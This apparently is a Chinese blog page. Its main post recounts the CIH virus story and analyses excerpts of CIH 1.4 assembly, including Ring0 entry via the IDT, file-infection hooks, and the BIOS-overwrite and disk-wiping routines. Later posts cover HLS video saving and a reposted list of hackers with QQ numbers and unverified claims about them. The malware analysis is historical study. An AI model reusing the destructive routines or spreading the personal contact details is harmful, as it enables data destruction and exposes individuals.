CIH二三事

在母亲的回忆里,中学时的陈盈豪就很喜欢玩电脑,上了高中后更是开始专心研究电脑软件。高一那年,他开始学习 BASIC 和 C 语言,「那时候我一点都不懂,我的电脑启蒙是从电脑游戏开始的」。插卡、拔卡、研究游戏,以为这一辈子要变成游戏的设计者的他从没想过要成为病毒的制造者,报考大学也是为了写出完美的程序——因为「电脑对于我来说就是一切」。

T 恤、短裤、凉鞋,常常一副还没睡醒的样子就来上课,就是大学同学眼中的陈盈豪。不过一提起电脑马上变得不一样,甚至一下课就会跑会宿舍打开电脑,练习编程。

Windows 95 的出现让他转移了注意力,大二时开始研究 Windows 的 Kernel(内核,操作系统的核心部分)。每天打开系统找 Bug,有时为了怕自己忘记已经进行到哪里,常常 24 小时不睡觉一直不停的调试。直到他发现 Windows95 只要通过一行 C 语言程序就可以让系统宕机,这行程序能毁掉中断向量表——这也是 CIH 病毒体积只有 700 个字节,却能毁掉系统的原因之一。1不到1KB就能删除你的BIOS,破坏你的硬盘。2

他一致强调兴趣执着和专注力。在 2013HITCON 现场,主持人问及如何在接触电脑 5 年的时间内就能写出 CIH,陈盈豪的回答是「因为只做一件事」。专注于一件事情,网站、Java 都不写,把所有时间都放在专注研究 Kernel 上。

高一第一次接触电脑病毒时,陈盈豪觉得病毒很恐怖、担心会被传染,大学的课程和对专业知识的钻研造就驱散了这些恐惧。大四时周围的人都说电脑病毒无法毁掉 BIOS(基本输入输出系统,为计算机提供最底层的、最直接的硬件设置和控制),他却认为有工具能升级 BIOS,那么病毒也可以升级它。为了调试程序陈盈豪电脑的 BIOS 当然也烧掉过——屏幕一片漆黑——再烧买来的第二颗新的 BIOS。

不眠不休的一步步调试,再加上喜欢优化程序一个一个字符的减少病毒体积,CIH 病毒最后只有不到 800 个字节。作为实验程序,CIH 被陈盈豪存储在校内供他个人使用的主机上,并加上了「病毒」的警告。他的本意并不是为了造成破坏,CIH 的流行是因为在他不知情的状况下,他的同学使用了实验用电脑而将病毒携出。

不然谁会用自己的名字,去命名一个病毒?

体积小、能自行改变程序码分布、又能隐藏在文件未使用的空白区且不改变文件大小,CIH 由于不易察觉而迅速传播开来。1998 年 4 月 26 日 CIH 第一次爆发就震惊了世界,让 6000 万主机宕机的病毒背后,竟然是一个还在读大学的年轻人。

源码分析2

CIH 1.4 的源码可以在github上找到。作者的编码习惯很好,各部分都也有注释,开头部分是版本记录,将版本变化的具体时间和具体功能都记录了下来。

我们先把时间线理一下。

1.0版的完成时间是1998年4月26日, 完成基本功能,此时病毒的大小是656个字节。

1.1版的完成时间是1998年5月15日, 增加操作系统判断,如果是WinNT,则不运行病毒,此时病毒的大小是796个字节。

1.2版的完成时间是1998年5月21日, 增加删除BIOS和破坏硬盘功能,此时病毒的大小是1003个字节。

1.3版的完成时间是1998年5月24日, 修复感染winzip自解压文件的错误,此时病毒的大小是1010个字节。

1.4版的完成时间是1998年5月31日, 彻底修复感染winzip自解压文件的错误,此时病毒的大小是1019个字节。

1998年7月26日,CIH病毒在美国大面积传播;1998年8月26日,CIH病毒实现了全球蔓延,公安部发出紧急通知,新华社和新闻联播跟进报导;

之后,CIH病毒作者陈盈豪公开道歉并积极提供解毒程式和防毒程式,CIH病毒逐渐得到有效控制。

PE文件头

源码第一部分是文件头:

OriginalAppEXE SEGMENT

FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
.....
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

就是PE文件的MZ文件头。

这段文件头的主要目的是为了符合PE(Portable Execute, 可移植执行文件格式)文件格式.我们常见的EXE,DLL,OCX等文件都必须符合微软规定的PE格式,这样Windows操作系统才能识别并执行,这里我们跳过不做分析,感兴趣的读者可以对照PE文件头和源码自行分析。网络上也有很多关于PE格式分析的文章。

另外,请各位读者注意,因为CIH的故事已经过去很久了,CIH所曾经使用的有些技术已经过时,但却能在今天找到借鉴,有些技术则没有过时,可谓生命力顽强,这一点我会在文章中一一指出,希望能供大家参考借鉴。

VirusGame SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************

病毒真正开始运行是从VirusGame段开始的。作者完成这个病毒时是23岁,还是少年人的心性。

修改SEH

MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

程序的第一段是修改Windows的SEH(Structured Exception Handing)。首先,什么是SEH?为什么要修改SEH呢?

SEH,Structured Exception Handing, 结构化异常处理,是Windows操作系统的异常和分发处理机制.该机制的实现方式是将FS[0]指向一个链表,该链表告诉操作系统当出现异常的时候应该找谁处理。

类似于我们现实生活中的紧急联系人列表,如果应用程序出了什么问题,就交给链表中的一号紧急联系人处理,如果一号紧急联系人无法处理,就交给二号联系人。依次类推。当所有的异常处理函数都调用完成,而异常仍然没有处理掉,这时,操作系统就会调用默认的异常处理程序,通常是给出错误提示并关闭应用程序。

而修改SEH的原因我们会在稍后介绍。

以上代码通过修改FS[0]使得当前的SEH指向StopToRunVirusCode

SEH是Windows提供的异常处理机制,直至今天仍然在各个安全领域应用。

进入内核

odify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

push esi

mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address

pop esi

int HookExceptionNumber

接下来这段代码通过修改中断描述符表,获得CPU的ring0权限。

而在WinNT操作系统中,IDT所指向的内存已经无法修改,因此在执行这段代码时,会产生异常。也就是说,这种获取Ring0权限的方法,现在已经没有效果了。

因此,上段代码修改SEH,或者称为编辑SEH的目的就很明了了。

目的就在与识别当前的操作系统,如果发现是WinNT或以后的操作系统,就会自动产生异常并跳到StopToRunVirusCode,停止运行。

当在win9x操作系统时,这段代码通过修改中断描述符表,使异常处理函数指向MyExceptionHook。最后一句

int HookExceptionNumber

则直接触发异常,进入MyExceptionHook。下面我们进入MyExceptionHook进行分析。

MyExceptionHook:
@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !? *
; *************************************

mov ecx, dr0
jecxz AllocateSystemMemoryPage

这里有一个小技巧。病毒使用dr0寄存器存放病毒的安装状态,dr0寄存器主要用于调试,在应用程序正常运行过程中一般不会修改。因此,将其作为一个全局的临时寄存器。

第一次进入MyExceptionHook时,因为jz的条件并不成立,并不会跳到InstallMyFileSystemApiHook, 而是跳到AllocateSystemMemoryPage进行内存的分配。

此后我们还会第二次回到MyExceptionHook,这时才会调用InstallMyFileSystemApiHook,安装系统钩子。

; *************************************
; * Merge All Virus Code Section *
; *************************************

push esi
mov esi, eax

LoopOfMergeAllVirusCodeSection:

mov ecx, [eax-04h]

rep movsb

sub eax, 08h

mov esi, [eax]

or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

jmp LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

pop esi

在调用AllocateSystemMemoryPage分配了系统内存后,接下来这段代码会将病毒代码复制到此前分配的系统内存中。

挂钩系统调用

; *************************************
; * Generate Exception Again *
; *************************************

int HookExceptionNumber ; GenerateException Again

接下来第二次调用int指令进入MyExceptionHook。接着会跳到InstallMyFileSystemApiHook。

InstallMyFileSystemApiHook:

lea eax, FileSystemApiHook-@6[edi]

push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Address

pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax

cli

jmp ExitRing0Init

顾名思义,以上代码就是把病毒的文件处理函数hook到系统调用中。采用的是一种已经被Windows废弃了的技术,叫做VXD,这种技术只能在win9x系统上才能使用,到了WinNT已经不能使用了。

但实际上原理是一样的,主要的目的是挂钩文件操作函数的系统调用,方法也大同小异,先获取旧的系统调用地址,使用我们的调用函数替换旧的函数,执行完我们的功能后回到旧的地址。

花开两枝,我们各表一支。到这里我们先记住,病毒安装了一个系统调用钩子,当执行文件操作的时候,会运行到我们的钩子函数里面。

这里我们看到,安装完钩子以后,会跳到ExitRing0Init,退出ring0状态。

ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

iretd

退出Ring0之后接着向下走。

; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti

xor ebx, ebx

jmp RestoreSE

RestoreSE:
pop dword ptr fs:[ebx]
pop eax

; *************************************
; * Return Original App to Execute *
; *************************************

pop ebp

push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Return to Original App Entry Point

这时,打开中断并恢复之前被病毒修改的SEH,毕竟我们的中断已经关得够久了。

最后,如果是通过其他被感染的程序进来的,就回到之前程序的入口点继续执行,否则,直接ret退出。

接下来,我们分析之前挂钩的函数FileSystemApiHook;

当有文件读写调用时,Windows会调用被病毒替换的FileSystemApiHook。

因为是VXD的驱动程序,程序借鉴意义不大,到这里,我们加快速度,分析的粒度会粗一些。

首先根据系统调用的入参判断是否是打开文件调用。如果是打开文件调用则获取需要打开的文件的路径。

接着,作者用大概100行左右的汇编代码判断一个文件是否是PE文件,如果是PE文件就将病毒代码感染到文件中。

感染的方式将病毒代码写入PE文件,修改PE文件的签名,并修改入口点为病毒代码。

; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************

WriteVirusCodeToFile:
......

jmp WriteVirusCodeToFile

潜伏与发作

同时,当系统调用参数为cloasefile时,进行当前时间判断:

CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************

popf
pop esi
jnc IsKillComputer

IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h

xor al, 26h ; ??/26/????

在IsKillComputer可以看到CIH设计了一个潜伏策略,先感染,然后并不发作,以增加感染的机会,直到当前日期是26日时大家统一发作。

当时间悄然的来到26号时,CIH开始破坏BIOS和硬盘。

破坏BIOS的方法为:

1.将BIOS的内容映射到内存,然后设置BIOS可写。主要调用了IOForEEPROM和EnableEEPROMToWrite。

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al, 44h

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
out dx, al

ret

从上面的代码可以看到,CIH使用in,和out指令进行BIOS数据的修改。

而破坏硬盘的方法是利用了我们之前提到的VXD调用IOS_SendCommand。

KillHardDisk:
......
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
......
jmp LoopOfKillHardDisk

总结

最后,我们来梳理一下:

  1. 病毒得到执行后会修改IDT,进入内核。这应该算是Win9X系统的一个漏洞,在WinNT及以后的系统这种进入内核的方法已经失效。

  2. 进入内核的主要目的安装系统钩子,钩住文件读写调用,钩住系统调用后退出Ring0;

  3. 当有文件读写调用且文件是PE文件时,将病毒感染到PE文件中。

  4. 潜伏下来,直到每月的26日统一发作,开始破坏BIOS和硬盘数据。

后续1

由于新竹和台北的科技企业离故乡太远,陈盈豪毕业后选择了一家做 Linux 系统的公司工作,因为「骑车只要 10 分钟」。后来又到集嘉通訊为系统排除疑难杂症,还开发出了一套自己独有的分析程序(被他称为「善良病毒」)测试手机系统。

2012 年,休假的陈盈豪选择徒步环台湾岛一周。55 天、1200 公里,每天 10 小时的步行,在路途上思考「为什么而活」。旅途上积累的回忆却没有产品梳理,休息了一年后的 2013 年 7 月,陈盈豪正式开始了自己的创业项目 8tory。8tory 是一款基于照片 GPS 信息的照片分享应用,当你拍完照片就能看到照片的地点、地图,还可以向他人展示你的经历。主打「回忆」的这款安卓客户端应用。

CIH Linked-in profile

在知乎「那些曾经大名鼎鼎的黑客现在都在干什么?」这个问题下(没错他已经注册了知乎),陈盈豪写下了创业的艰难,需要面对用户、面对投资人、需要资金,「一直被用戶狠狠的教訓」,但并不会放弃。

(2015年)7 月陈盈豪将会来到北京,参加乌云白帽子大会。


2022-01-25

网页嵌入QQ联系方式

该功能基于QQ推广,目前可以直接访问这里,登陆用作联系方式的QQ号,直接复制HTML代码就可以啦。

点击这里给我发QQ消息


2021-10-04

网络视频获取

犹记得当初视频获取之便利。今日互联网,能看到视频但不能下载。 提供视频解析服务的网站/软件

硕鼠

b站(网页版)

IDM、迅雷等下载工具捕获

HLS(HTTP Live Streaming)协议视频获取

HLS把媒体分成一个.m3u8列表,和列表里的.ts分片视频1。获取原媒体只需要通过URL获取.m3u8文件即可。

.m3u8下载地址之获取2

一、使用Web浏览器

以央视影音的一篇视频为例,页面地址:http://app.cctv.com/special/cbox/detail/index.html?guid=e8b80233f53c4b8fb35a7bd5f0e0b535&vsid=C10437#0

使用Chrome浏览器打开这个网页,然后鼠标右键 -> inspect(检查),可以看到如下的界面:

1

注意切换到红色箭头所指的Network(网络请求)标签。

然后按Ctrl+R或浏览器刷新按钮,刷新网页,重新加载网页数据,这时这边的检查器的Network标签就会记录所有的网络文件请求,如下图:

2

待视频播放几秒钟后,可以点击红色箭头所指的按钮,停止录制。

3

然后点击上图中的搜索按钮(红色箭头所指);然后搜索框中输入“.m3u8”来查找m3u8文件。 找到对应的文件,然后右键复制地址

4

找到m3u8文件后,鼠标右键 -> Copy(复制)-> Copy link address(复制链接地址)。

这样就成功获得m3u8的播放地址了。类似的Firefox可以用开发者工具(Web Develope Tool)。

二、Video Download Helper

Video Download Helper是两大Web浏览器Chrome、Firefox都有的扩展(extension/add-on)。安装好之后然后在视频页面直接点击插件图标,然后选择一个流,就可以获取到m3u8的地址。

5

得到目标视频

一、VLC播放器

我本来是用Potplayer,但是今天接触到VLC后有心用它取代Potplayer。多操作系统支持,功能强大,就是体积略大(40MB)。

6

按Ctrl+N,把刚才获取到的m3u8地址粘贴到地址栏中,如下图红色箭头处:

7

然后,注意蓝色箭头处,点击右侧的小三角,然后选择“转换”

8

将配置文件设置为mp4格式,然后目标文件设定为你想要保存的目录及文件名,然后点击开始,视频就开始转换啦。

二、Video Download Helper

Video Download Helper需要额外从Github上下载支持程序。作者表示使用ffmpeg合并.ts文件。ffmepg中对h264的编码也使用了VLC所用x264来编码(Encode)3,但是我做了一个测试,两种方法结果不同。Video Download Helper(下图左)生成质量不如VLC。

另外,为了延长SSD使用寿命,更改Video Download Helper的保存目录(Firefox、支持中文目录):

管理扩展->Behavor->Default download directory->Change->Save

9


2021-09-29 SSD延寿

信息安全名人

2010新编中国顶级安全圈内人物12

在下面这些人中很多人手握众多危害极大的未公开漏洞。就是圈内所称的0day。这类危害极大的0day一般在黑市上可以卖的数十万人民币。

sunwear QQ:47347 微博: http://t.qq.com/sunwe4r 博客:http://hi.baidu.com/patricksunwear 好像不用了 日娃哥。EST核心成员。圈内皆知他手握很多未公开漏洞。渗透入侵和漏洞方面的高手,曾是编程内核牛人。曾经入侵过世界顶级黑客组织Metasploit,剑桥大学等众多高端机构。几年前的世界最顶级两大黑客大会defcon和blackhat都对他有过报道。

刺 QQ:32750912 微博:http://t.qq.com/aullik5 博客:http://hi.baidu.com/aullik5 刺哥,大风哥。身材瘦弱。是中国黑客圈内纯技术黑客组织幻影旅团创始人。中国顶级黑客之一。目前好像就职于淘宝公司网络安全部门。也是手握很多未公开漏洞 的人。很多影响力很大的0day都是出自幻影旅团。WebZine的发起人。并且发展过WIKI的系统。还曾远赴美国参加世界顶级黑客大会 blackhat。。

dm QQ:不详 微博:http://t.qq.com/zoeluk 博客:http://hi.baidu.com/int3 国内顶级地下黑客组织0×557核心成员。是漏洞挖掘,利用方面的高手。不用说,手里的漏洞也是多的可以批发了。目前就职于世界著名反病毒杀毒软件公司麦咖啡(刚刚被intel收购)。现在还写起了iphone,ipad下的安全软件。看来是个全能选手。

flashsky QQ:38062 & 16202253 博客:http://hi.baidu.com/fs_fx 微博:http://t.qq.com/flash-sky 方兴。闪空哥。国内著名黑客组织安全焦点核心成员。2003年WINDOWS历史上最严重安全漏洞细节全球首发者,数百个高危级安全漏洞发现者,历任启明 星辰,美国EEYE,美国微软特聘安全专家,美国微软BLUEHAT第一个中国演讲者,安全焦点成员,南京翰海源信息技术有限公司创始人和CEO。对漏洞 方面的研究是相当高深的。预祝公司发展顺利。

tombkeeper QQ:644909 博客:http://hi.baidu.com/tombkeeper 微博:http://t.qq.com/tombkeeper 于某。传说中的tk教主。国内著名黑客组织安全焦点核心成员。就职于绿盟科技,俗称妇科圣手。对windows操作系统以及漏洞等方面的研究可以说是非常精通。而在安全焦点论坛,最近几年一直被人奉为TK教主。对于其他领域的科学也有着独到的见解。文笔思想也是很独特的。

glacier QQ:1973435 微博:http://t.qq.com/glacier 黄鑫。冰河哥。黄总。同为国内著名的黑客组织安全焦点核心成员。深圳大成天下的创始人之一。是中国最早的远程控制木马”冰河”的作者,也是著名安全扫描工 具”x-scan”的作者。黑客编程方面的高手,对于网络协议,加密安全以及软件工程有很深的了解。女黑客wollf的老公。一个风趣幽默的人。从微博上 就可以看出来了。已经当父亲了,当然孩子不是木马,是一个帅哥。再此祝福一下。

swan QQ:不详 微博:http://t.qq.com/Swan557 0×557(SST)核心成员,对于linux,windows操作系统上的漏洞可谓了如指掌。

goodwell QQ:19558287 微博:http://t.qq.com/goodwell 龚蔚。安致信息技术有限公司。中国早起黑客组织绿色兵团创始人,是传说中的中国黑客教父。曾经接受过中央电视台的参访。是以为资深的魔兽世界玩家。

xundi QQ:518860 微博:http://t.qq.com/idnuxzhang 张迅迪。国内早期的著名黑客组织安全焦点创始人。具体就不过多介绍了,因为不熟悉,哈哈。

lion QQ:21509 微博:http://t.qq.com/coollion 林勇。中国红客联盟创始人。跟大多网民在网上所了解到的中国红客大联盟不同。这个才是真正的中国红客联盟。至于所谓的sharpwinner,我只能用一句文明用语敏感词来形容“SB”“草泥马”。现在对于技术不如当年,而且已经远离技术告别当初了。

isno QQ:1070681 微博:http://t.qq.com/isnoblah 安全焦点核心成员之一。目前就职于北京中航嘉信公司。曾经写过很多漏洞溢出方面的分析利用文章(WEBDAV,IDQ,IDA等)。exploit也写过很多。现在较为低调。

天行 QQ:911189 微博:http://t.qq.com/tian_xing 好像不怎么用 中国第一代黑客之一。在1999年曾经与发动对国外网站的攻击。网络刺客,网络卫兵是其代表作品。而他对溢出和漏洞利用也颇有研究,例如RPC漏洞利用程序。以及他写的后门都很好。

quack 微博:http://t.qq.com/wulujia 吴鲁佳。深圳达成天下创始人。与中国木马之父黄鑫关系很好。安全焦点早期活跃之人,ID:quack。

icbm QQ:不详 http://t.qq.com/icbmx2 基本不用 赵伟。知道创宇创始人之一。曾经就职于国内著名信息安全公司启明星辰积极防御实验室。对各操作系统以及第三方软件的漏洞有很深的了解,手下的未公开漏洞很多。包括基于web方面的一些独特漏洞。

sowhat QQ:不详 http://t.qq.com/secsecsec 薛峰。就职于某保密单位。曾赴美国参加过国际顶级黑客大会blackhat。手握很多未公开漏洞。好像今年中国顶级黑客盛会xcon上还抽奖中了一台PS3。

vxk QQ:86879759 微博:http://t.qq.com/cvcvxk 几年前活跃于国内著名病毒论坛CVC。是国内知名的病毒专家。对操作系统内核以及编程,逆向,破解非常精通。可谓程序全能专家。

refdom 微博:http://t.qq.com/refdom 安全焦点核心成员之一。曾经是中国红客联盟的一员。

watercloud 微博:http://t.qq.com/watercloud 知道创宇公司创始人之一。与icbm关系甚好。安全焦点核心成员之一。对漏洞,加密解密等方面有者多年的研究经验,网络安全趋势与发展有着独到的见解。最主要的还是对漏洞,0day方面,手握0day数量也很客观。

alert7 QQ:415451 博客:http://hi.baidu.com/weiwang_blog 安全焦点核心成员之一。曾经就职与著名杀毒软件MCAFEE。目前就职于南京翰海源(Flashsky的公司)。对linux 方面的研究经验长达10年以上。对于linux等开源系统漏洞溢出分析利用了如指掌。

袁哥 博客:http://hi.baidu.com/yuange1975 传说中的袁哥。没错,中国所有圈内顶级黑客无不佩服的人。就只与绿盟科技。袁哥在数学,编程,漏洞等诸多方面的造诣是无人可以比拟的。很多漏洞要早其它人数年之久就已经发现并且完美利用了。堪称漏洞方面的其人。黑客界的顶级高手。

sunx QQ:239670 孙华。国内非常著名的黑客编程高手,对漏洞溢出与利用和有研究,写过EXPLOIT。例如IDA漏洞和printer。在9X年代用汇编写过病毒。并且还编写过操作系统后门程序。

funnywei QQ:25044885 魏强。F博士。安全焦点核心成员之一。漏洞挖掘,漏洞利用方面的高手,在历届国内顶级黑客盛会XCON上都能见到他的身影。据传就职于中国人民解放军XXX部。为中国人民解放军提供很多未公开漏洞。

小榕 (蚊虫添加:微博http://t.qq.com/ipconfig真实性有待考证) 中国早期著名黑客软件“流光”“逆雪”“乱刀”“黑客字典生成器”“ARPSNIFFER”“命令行注入工具”等黑客软件作者。目前对于漏洞方面等技术不如以上几人。不过对于中国黑客界的贡献还是不可小觑的。

xikug QQ:53564797 国内著名内核,漏洞,程序研究站debugman的站长。逆向,破解,加密,解密,内核等方面的高人。

baoz 微博:http://t.qq.com/perlish 方勇。包子。fatb。多年前就活跃于中国黑客界。活跃程度和人缘还是不错的。目前就职与迅雷公司。有大牛曾说是个带眼镜的胖子。为人厚道,皮肤较黑。

wzt QQ:71579912 微博:http://t.qq.com/wztjlh 曾经的中国红客联盟核心成员。对于linux内核,以及linux漏洞方面颇有研究。

czy QQ:484323 四川的一个著名黑客,比较低调,但地下交流圈子中交流频繁。手握很多0day的高手。

zzzevazzz QQ:49322630 博客:http://zzzevazzz.bokee.com/ 国内著名黑客组织幻影旅团核心成员。早期混迹于灰色轨迹。曾经著名的do all in cmdshell 作者。曾经在安全焦点普及ntsd知识,红极一时。对于windows内核以及漏洞方面有着深入的了解和经验。曾经写过很多有利于大众的文章,分享过很多宝贵的经验。

vessial QQ:不详 微博:http://t.qq.com/vessial 同dm一样就职于国际顶级杀毒软件安全厂商麦咖啡公司。也是一位对于漏洞等方面有诸多经验的高手。

bkbll qq:78384349 dumplogon。BK哥。中国红客联盟核心成员之一。2001年中美黑客大战时期技术还是初级的,但也算早期了。后来对溢出,漏洞以及逆向分析方面颇有研究,技术不错。是lion的好朋友。

killer 微博:http://t.qq.com/dongzhiqiang 博客:http://hi.baidu.com/killer 董志强。安全焦点核心成员之一。曾经就只与启明星辰公司。对于病毒与防病毒,逆向工程与破解等方面有多年的研究经验。目前为著名安全产品超级巡警的BOSS。

coolq qq:49462335 就职于绿盟科技的linux方面高手。在绿盟期刊上曾发有著作。对于开源系统有着多年的应用开发经验。linux,unix,bsd内核方面以及漏洞挖掘,利用方面也有着多年的经验。

pjf qq:85863144 博客:http://pjf.blogcn.com/ 国内著名antirootkit工具icesword的作者。是内核方面的专家。国内著名安全软件公司奇虎360公司的核心开发人员。

lcx 海洋顶端网站长,是国内渗透入侵方面的高手,有着多年的入侵经验。是中国网马教父之一。安全手册的顾问。

村长 QQ:6021240 国内顶级黑客组织0×557(SST)创始人。是国内著名信息安全公司启明星辰积极防御实验室的BOSS。对windows,linux非常了解,拥有多年的漏洞挖掘,利用的经验。

casper QQ:843525 华永兴安BOSS。国内顶级黑客大会xcon的主办方,也是安全焦点创始人之一。中国黑客界的老前辈。目前已经脱离技术领域,向老板发展了。

e4gle QQ:1949479 国内著名黑客组织WSS核心成员。老一代的黑客。对linux,unix下的溢出漏洞分析以及利用有着多年的研究经验,并且对病毒也很了解。 ——————–华丽的分割线———————-

下面将列举一些新生力量,虽然是新生,但起码都是3-6年前左右就开始活跃的人,所以还算是中生代黑客。

mj0011 QQ:保密,避免骂他的人太多。 博客:http://hi.baidu.com/mj0011 就职于国内著名安全公司奇虎360。为核心工程师。圈内敌人无数,只因口无遮拦,相貌丑陋等缺点所导致。对瑞星,金山等公司曾经常出言讽刺,另外连国际顶 级安全厂商赛门铁克也不放过。可谓毒舌娘子,连我也被骂过好几次。话说回来,对于编程,内核,木马,远控方面的技术还是不可否定的。

baiyuanfan QQ:51449276 曾经著名的后门程序BYSHELL的作者。曾经在某界安全焦点峰会上有过演讲议题,技术还是不错的。

zwell QQ:27592430 网站:http://www.nosec.org 白远方。曾经NB联盟核心成员。现在为诺塞科技的老大。诺塞科技的产品现在也广为圈内所知,例如穿山甲,JSKY等工具。对编程和注入WEB方面的东西也是很精通的。

sudami qq:527463097 微博:http://t.qq.com/sudami 博客:http://hi.baidu.com/sudami 目前就职于国内著名杀毒软件安全软件厂商奇虎360公司。是后起的windows编程,内核之秀。对渗透攻击,入侵方面技术基本为零。曾在邪恶八进制,DEBUGMAN等论坛发表过多篇原创文章。对技术很有追求,进步很快的一个牛人。

oldjun 微博:http://t.qq.com/seuhacker 博客:http://www.oldjun.com/ QQ:34680304 t00ls核心成员。asp,php等WEB脚本方面的高手,对于渗透入侵,WEB渗透相当精通。

9xiao 博客:http://hi.baidu.com/9xiao & www.9xiao.net 微博:http://t.qq.com/deioncube t00ls核心成员,原火狐联盟的人。

aono QQ:13335589 微博:http://t.qq.com/air-storm t00ls核心成员。无线安全方面的高手。在无线网络安方面有其独特的技术思想和经验。

云舒 QQ:21287305 微博:http://t.qq.com/yunshuy 是幻影旅团的核心成员之一,目前同axis一同就职于淘宝公司。其实也算的上是一位比较有资历的老人了。应该位列在上面。写过synflood方面代码。

明小子 QQ:830540 网站:http://www.hackdiy.com/ 黑客动画吧的人。著名的明小子旁注工具domain的作者。相比很多菜鸟都以及享受过这个工具的实惠了。其实技术只能说是一般。不过入行也不久了。注入脚本以及简易的编程还是不错的。

鬼仔 QQ:359421 博客:http://huaidan.org 目前就职于新浪公司。WEB应用安全方面的高手。

lake2 QQ:http://t.qq.com/mrhupo 微博:http://t.qq.com/mrhupo 脚本,数据库,渗透方面的高手。目前就职于腾讯QQ公司。

neeao (蚊虫增加 微博http://t.qq.com/Neeaocn 站 Http://Neeao.com) QQ:35789112 WEB应用安全及脚本方面的高手。

u#0h4x0r 博客:http://www.noahacker.com/ QQ:645041992 对JAVA有一定了解,对渗透也有一些研究。入侵过不少无辜网站。

hmily qq:68857640 微博:http://t.qq.com/Hmily_LCG 博客:http://hi.baidu.com/52hmily 吾爱破解的BOSS。是程序破解,软件破解,加密解密,逆向工程方面的高手。破解过很多大家常用的工具,如穿山甲。

xi4oyu 博客:http://www.pentestday.com/ & http://hi.baidu.com/xi4oyu 微博:http://t.qq.com/evil_xi4oyu qq:909473606 linux方面的高手。

猪猪 QQ:82648 & 100298 岁月联盟站长。入行也有几年了。曾经参加过爱国反击黑客战。也入侵过不少圈内的同行网站。对ASP,注入方面比较了解。

rayh4c qq:30039780 博客:http://hi.baidu.com/rayh4c 微博:http://t.qq.com/rayh4c 茄子宝。80SEC核心成员。对xss,CSRF等脚本漏洞非常精通。经验丰富。

superhei QQ:123230273 微博:http://t.qq.com/hi_heige 幻影旅团核心成员。曾经写过著名的php注入漏洞利用工具。发现过很多国内流行的php程序漏洞。是WEB脚本,数据库方面的专家。

ring04h QQ:153520368 博客:http://hi.baidu.com/ring04h EST核心成员。与国内顶级黑客sunwear关系甚好。曾一同入侵过国内最著名的两大PHP论坛。此人对php,数据库等方面相当精通。

冰血封情 QQ:310926 博客:http://weblog.eviloctal.com/ EST创始人。传说中的中国第四代黑客。据传说已经自己开公司,很久不做技术了。

冰的原点 QQ:519249638 博客:http://hi.baidu.com/���ԭ�� 微博:http://t.qq.com/icezone 黑客手册常见的人。是入门级黑客书籍《黑客渗透笔记》的原作者。对于初学者来说还是有一定学习价值的。

friddy 博客:http://www.friddy.cn QQ:568623 专门搞漏洞挖掘的人,虽然技术上跟最上面的那些大牛级黑客比差一些,但相对来说还是不错的。另外也对入侵检测有所研究。

余弦 qq:331861985 微博:http://t.qq.com/evilcos xeye成员。目前就职于icbm的知道创宇公司,是web,脚本等方面的高手。

教主 QQ:130138438 网站:www.jiaozhu.org 圈内名气还算比较大的,主要还是因为他刷库赚钱很多。并且赔的也比较快。呵呵。技术不怎么样,但很能买很能卖。

